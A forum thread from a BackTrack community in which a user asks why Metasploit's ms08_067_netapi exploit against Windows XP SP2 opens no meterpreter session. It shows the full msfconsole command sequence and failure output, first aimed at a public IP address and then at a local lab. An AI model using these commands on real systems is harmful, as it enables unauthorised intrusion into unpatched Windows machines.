Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: meterpreter session not created

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    9

    Default meterpreter session not created

    I tried the ms08_067_netapi>>reverse_tcp on an XP SP2 English NX box from BackTrack4... It said exploit executed successfully but no session was created and that is all i got!
    Used command-line as well as gui several times but no use.
    So how do i go about it to test access to the XP box from backtrack4?

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    It sounds really obvious, but I will ask it anyway:

    Did you set your target
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    9

    Default

    ohh yes I did put in the target...

  4. #4
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    9

    Default

    ohh yes I did put in the target...
    i did "set RHOST 125.162.5.188" and ">>set TARGET 0"
    this is something like it was:[*] Selected Target: Windows XP SP2 English (NX)[*] Triggering the vulnerability…[*] Exploit completed, but no session was created.

    what does this mean?

  5. #5
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default

    Which payload are you using? Can you post all the commands you're using in msfconsole?

  6. #6
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    9

    Default

    i havent patched that XP SP2 or nethng...its a plain simple installation of xp sp2..

  7. #7
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    9

    Default

    these were the commands as far as i remember for bind_tcp..also used reverse_tcp but every time exploit executed successfully but no session is created

    Code:
    >> use windows/smb/ms08_067_netapi
    
    >> set RHOST 125.162.5.188
    
    RHOST => 125.162.5.188
    
    >> set PAYLOAD windows/meterpreter/bind_tcp
    
    PAYLOAD => windows/meterpreter/bind_tcp
    
    >> set TARGET 0
    
    TARGET => 0
    
    >> exploit

  8. #8
    Member
    Join Date
    Jan 2010
    Posts
    81

    Default

    Quote Originally Posted by djlaksh View Post
    ohh yes I did put in the target...
    i did "set RHOST 125.162.5.188" and ">>set TARGET 0"
    what does this mean?

    you use a extern IP, have you 2 internet-conections? are the host not in your intern network? if no, then you must forward the port on your router..

    if you use this intern, then you have the fals IP, use the intern IP..


    must you not set LHOST?

    ozzy

  9. #9
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    9

    Default

    ohh i tried it on a local machine too!
    from 10.0.2.3 to 10.0.2.4
    same issue!!
    no session created!

    i did set the LHOST (in case it was reqd)

  10. #10
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    9

    Default

    check this out....looks similar to my problem..hope this explains..
    h**p://mail.metasploit.com/pipermail/framework/2008-November/008474.html
    msf exploit(ms08_067_netapi) > exploit
    [*] Handler binding to LHOST 10.10.10.19[*] Started reverse handler[*] Automatically detecting the target...[*] Fingerprint: Windows 2000 Service Pack 0 - 4 - lang:English[*] Selected Target: Windows 2000 Universal[*] Triggering the vulnerability...[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [-] Exploit failed: DCERPC FAULT => 0xc00000fd[*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >

    this is what happens... NO SESSION WAS CREATED...

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •